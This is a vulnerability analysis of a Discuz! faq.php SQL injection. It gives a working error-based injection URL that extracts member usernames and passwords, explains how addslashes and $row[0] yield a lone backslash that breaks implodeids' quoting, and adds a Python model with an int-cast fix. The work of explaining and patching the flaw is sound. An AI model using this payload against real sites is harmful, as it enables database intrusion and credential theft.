Injection example:
The code is as follows:
http://www.php.net/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (select count(*),concat((select (select concat(username,0x20,password) from cdb_members limit 0,1) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
Vulnerability analysis (by Phithon):
The code is as follows:
if($action == 'grouppermission') {
    ...
    ksort($gids);
    $groupids = array();
    foreach($gids as $row) {
        // $row[0] on a string is its first character: an escaped quote "\'" becomes a bare "\"
        // $row[0] on an array is its first element, which arrives here untouched
        $groupids[] = $row[0];
    }
    $query = $db->query("SELECT * FROM {$tablepre}usergroups u LEFT JOIN {$tablepre}admingroups a ON u.groupid=a.admingid WHERE u.groupid IN (".implodeids($groupids).")");
    ...
}

function implodeids($array) {
    if(!empty($array)) {
        // wraps every element in single quotes and joins them with a comma
        return "'".implode("','", is_array($array) ? $array : array($array))."'";
    } else {
        return '';
    }
}
First an array $groupids is defined, then $gids (also an array, namely $_GET['gids']) is traversed, and the first element of every value is taken out and placed into $groupids.
Why does this operation lead to an injection?
Discuz! runs addslashes over the whole GET array globally, i.e. it escapes ' to \'. So if our argument is gids[1]=' it is escaped to $gids[1]=\', and the assignment $groupids[] = $row[0] then amounts to taking the first character of that string, which is the escape backslash itself; the quote it was protecting is left behind.
Looking further, the data is passed through implodeids before it is put into the SQL statement. Look at the implodeids function:
it is very simple: it wraps each element of the $groupids array in single quotes and joins them with ',', returning a string like '1','2','3','4'.
But our array has just acquired a lone escape character, which now escapes a perfectly normal quote, like this:
'1','\','3','4'
Notice the difference: the 4th single quote is escaped, so the 3rd and the 5th single quote now delimit one string literal (its content is ',), and whatever follows the 5th quote is no longer inside a string and is parsed as SQL. In the injection example above, gids[99]=' supplies the backslash and gids[100][0] (an array, so $row[0] is its whole first element, not escaped at all) supplies the SQL that lands in that position, with %23 (#) commenting out the rest of the statement.
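To see the mechanism end to end, here is an added example, not code from the original page or from Discuz!, that models the faq.php path in Python: addslashes on the request, the $row[0] step, implodeids, and the final query string, so the exact SQL the gids[] payload produces can be inspected offline. It assumes the cdb_ table prefix and a request shaped like PHP's $_GET['gids'] (integer keys, string or array values); the functions addslashes, implodeids and php_intval are Python models of the PHP behaviour, and the harden=True branch is one possible fix added here (casting the taken value to int), not Discuz!'s actual patch.

```python
import re

# Added example (not Discuz! code): Python model of the faq.php grouppermission path.
TABLEPRE = "cdb_"  # assumed Discuz! table prefix

# Constructed request mirroring the page's payload, URL-decoded:
#   gids[99]=%27            -> "'"
#   gids[100][0]=) and ...  -> one-element array; %23 is "#"
# floor(rand(0)*2) with GROUP BY is the duplicate-key error-based primitive that
# leaks the concat()'d username/password through the MySQL error message.
PAYLOAD = {
    99: "'",
    100: [") and (select 1 from (select count(*),concat((select (select "
          "concat(username,0x20,password) from cdb_members limit 0,1) from "
          "`information_schema`.tables limit 0,1),floor(rand(0)*2))x from "
          "information_schema.tables group by x)a)#"],
}


def addslashes(value):
    """Model of PHP addslashes(), applied recursively the way Discuz! treats $_GET."""
    if isinstance(value, dict):
        return {k: addslashes(v) for k, v in value.items()}
    if isinstance(value, list):
        return [addslashes(v) for v in value]
    return "".join("\\" + ch if ch in "'\"\\" else ("\\0" if ch == "\0" else ch)
                   for ch in value)


def implodeids(array):
    """Model of Discuz!'s implodeids(): quote every element and join with ','."""
    if not array:
        return ""
    if not isinstance(array, list):
        array = [array]
    return "'" + "','".join(array) + "'"


def php_intval(value):
    """Model of PHP intval() on a string: leading sign and digits, otherwise 0."""
    m = re.match(r"\s*([+-]?\d+)", str(value))
    return int(m.group(1)) if m else 0


def build_query(gids, harden=False):
    """Rebuild the WHERE ... IN (...) query from an already addslashes'd gids array.

    harden=False mirrors the original: $row[0] is the first character when $row
    is a string (so the escaped quote "\\'" collapses to a lone backslash) and the
    first element when $row is an array (which reaches the query untouched).
    harden=True is one fix, assumed here and not Discuz!'s own patch: cast the
    taken value to int so it can only ever be a number.
    """
    groupids = []
    for key in sorted(gids):        # ksort($gids)
        taken = gids[key][0]        # $row[0]
        groupids.append(str(php_intval(taken)) if harden else taken)
    return ("SELECT * FROM {0}usergroups u LEFT JOIN {0}admingroups a "
            "ON u.groupid=a.admingid WHERE u.groupid IN ({1})"
            .format(TABLEPRE, implodeids(groupids)))


if __name__ == "__main__":
    escaped = addslashes(PAYLOAD)
    print(build_query(escaped))               # attacker SQL sits inside IN (...)
    print(build_query(escaped, harden=True))  # IN ('0','0')
```

Running it prints the vulnerable query ending in IN ('\',') and (select 1 from ... )a)#'): the literal '\',' swallows the comma and the next quote, the subquery is live SQL, and # discards the trailing '). With the int cast both entries degrade to 0, which is the property to check for after a fix: nothing the client controls can reach the query as anything but a number.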